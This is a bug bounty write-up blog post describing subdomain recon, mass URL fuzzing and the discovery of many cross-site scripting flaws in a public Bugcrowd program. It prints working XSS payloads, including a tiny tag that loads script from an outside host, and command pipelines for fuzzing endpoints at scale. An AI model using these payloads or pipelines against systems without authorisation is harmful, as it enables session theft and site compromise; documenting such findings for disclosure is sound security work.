50+ Cross-site scripting (XSS) Vulnerabilities on Bugcrowd Public Program by Takshal (tojojo)
Hello everyone, I hope by God’s grace everyone reading this blog post is doing well and their families during this pandemic.
Let me introduce a person here who wrote this amazing article. He is Takshal also known as tojojo, a cybersecurity researcher and developer from India. He has an experience of 3+ years in the Information Security Industry and he also has a YouTube Channel in the name of Tojojo the link to the channel will be at the end of this blog post.
How I found 50+ Security vulnerabilities (Cross-Site Scripting) in a public program.
So I recently decided to explore more about our industry so the best way to start was Bug Bounty Hunting on a famous online platform known as BugCrowd after the registration process and later on to begin with the hunting I had to choose a public program after going through multiple programs I was able to find the target with a wildcard domain for the security reasons let’s call the domain name as abc.com.
After selecting the target domain, I had to do Recon on the domain with the help of different tools and techniques as I really enjoy doing the recon part.
The tools which were used during this process are:
- AssetFinder
- SubFinder
- Amass
- Find-domain
- Google Dorking
(Note: These tools are used to find the sub-domain of the target)
After running the tools, I was able to gather the information on the 576 Sub-domain list.
The Next process was to find the number of sub-domains
which are active
, for this process nowadays all the hunters use HTTPX
, which is a bit faster for the results, but I would prefer using httprobe
a tool which is made by a Security researcher Tomnomnom
.
As I am a huge fan of Tomnomnom
for his work and he has always kept me and others motivated to learn more about our industry.
Both tools have their own algorithm to identify any open port in the sub-domain to identify the open ports in the target with the help of httprobe
the command was used:
cat subdomains.txt | httprobe | tee -a host.txt
After the probing process, I was able to find 260 alive hosts and to reconfirm I had to manually check all the running hosts with the help of the Open Multiple URLs
extension by the TP developer,
to check all the available different functionality in the hosts, also parallelly I started to perform the Google-Dorking technique with the help of Google Dorking I was able to find some of the login pages of the target sub-domain.
So, I decided to check the login functionality over there I was able to find a sub-domain let’s name it xyz.abc.com.
When I was able to find the signup page after completing the signup process, I started to look around with all the functions available in that sub-domain. After going through everything I was able to find a vulnerable endpoint
in the URL where I was able to perform HTML injection.
But I was able to inject only a 20-character payload of the HTML injection
. I had to spend around 2days converting the HTML injection payload into a cross-site scripting payload
to exploit the high-impact vulnerability the payload which was used to exploit was a very tiny XSS payload:
<script/src=//NJ.₨></script>
After entering the payload, I was able to exploit the vulnerable endpoint which lead to Cross-site scripting (XSS). After examining everything I took the POC (Proof-of-Concept) and prepared a report and submitted it to the BugCrowd platform.
Later, after submitting the report there was no response from their end and they fixed the vulnerability silently without informing me and marked my report as NA (Not Applicable).
After this incident, I was very much depressed and disappointed and started to get negative vibes also I started doubting my skills which affected both my personal and professional life later on I decided to trust myself and my skill sets.
I had been working for 3 years so I return back with my own developed tools to the same platform and the same target program to show them my skills this time using the tool developed by me a custom Crawler script and with the help of waybackurl
script I was able to extract more than 50,00,000/- (Fifty lahks) Endpoint information
in all the sub-domains of the target abc.com. The commands used were:
cat host.txt | crawler | tee -a endpoint.txt
cat host.txt | waybackurl | tee -a endpoint.txt
After finding all the 50 Lakh endpoints I started to fuzz all the parameters to find XSS vulnerability with the help of the tool qsreplace
. The command used was:
cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
After executing the command now, I had to check the number of parameters that had been reflecting our payload into plain text and whether or not,
So I created a tool named FREQ
which is also available in my GitHub repo. So, the tool sends multiple requests to check whether the response containing the payload returns us with the affected URLs.
The command used to perform this attack was:
cat xss_fuzz.txt | freq | tee -a possible_xss.txt
After the compilation of the attack, I was able to find one thousand
endpoints which is reflecting the payload in the form of clear Text. So,
I had to go through all the affected endpoints again manually and I was able to find a unique 80 XSS vulnerabilities in which I reported around 56 XSS vulnerabilities
and all the reported vulnerabilities are accepted by the platform. Still, a number of other XSS reports are pending.
Thank you everyone for making time and going through my blog post and I am sorry if there are any grammatical mistakes in the blog.
What an Amazing Article By Takshal Patel
Tojojo’s Youtube Channel: https://www.youtube.com/@tojojo9625
Support me: If you like to support me, buy me a cup of coffee ☕
Follow me: @0xKayala | Satya Prakash